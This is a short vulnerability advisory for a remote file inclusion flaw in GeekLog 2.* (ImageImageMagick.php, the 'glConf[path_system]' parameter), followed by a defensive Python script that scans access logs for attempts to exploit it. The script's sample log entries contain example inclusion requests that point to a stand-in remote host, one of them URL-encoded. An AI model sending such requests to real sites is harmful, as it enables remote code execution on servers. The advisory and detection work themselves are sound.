Vendor: GeekLog
By: rgod
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: GeekLog
Affected Version From: GeekLog 2.*
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Platforms Tested:
2007
GeekLog 2.* (ImageImageMagick.php) RFI Vuln
The vulnerability allows an attacker to make ImageImageMagick.php include a remote file. By manipulating the 'glConf[path_system]' parameter, an attacker can specify a malicious file hosted on a remote server, which is then executed on the target system.
Mitigation:
The vendor has released a patch to fix this vulnerability. Users are advised to update to the latest version of GeekLog.
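For sites that cannot patch immediately, or that want to check whether the flaw was probed, the following is an added example (not part of the original advisory or of GeekLog) that scans web access logs for requests supplying 'glConf[path_system]' to ImageImageMagick.php. It assumes Apache/nginx common log format and inspects only the query string; the `/PLACEHOLDER/` directory and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

SCRIPT = "/imageimagemagick.php"      # file named in the advisory (lower-cased)
PARAM = "glConf[path_system]"         # parameter named in the advisory

# Request line inside a common/combined access-log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL or stream-wrapper scheme; two or more characters so "C:/..." is not matched.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]+:", re.I)

def classify(log_line):
    """Return 'remote-include', 'param-override' or None for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, so encoded variants match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == PARAM:
            remote = SCHEME.match(value) or value.lstrip().startswith(("//", "\\\\"))
            # A client has no legitimate reason to set this value at all, so a
            # local-looking value is still reported, at lower severity.
            return "remote-include" if remote else "param-override"
    return None

def scan(lines):
    """Return (line_number, verdict) for every suspicious entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample entries; addresses are from documentation ranges.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2007:10:01:22 +0000] "GET /PLACEHOLDER/ImageImageMagick.php?glConf[path_system]=http://remote.invalid/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2007:10:01:25 +0000] "GET /PLACEHOLDER/ImageImageMagick.php?glConf%5Bpath_system%5D=hTTp%3A%2F%2Fremote.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Mar/2007:10:02:00 +0000] "GET /index.php?topic=news HTTP/1.1" 200 8841',
    '198.51.100.9 - - [12/Mar/2007:10:03:10 +0000] "GET /PLACEHOLDER/ImageImageMagick.php?glConf[path_system]=/var/www/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(f"line {number}: {verdict}")
```

Values sent in a POST body or cookie do not appear in access logs, so a clean result here does not rule out an attempt through those channels.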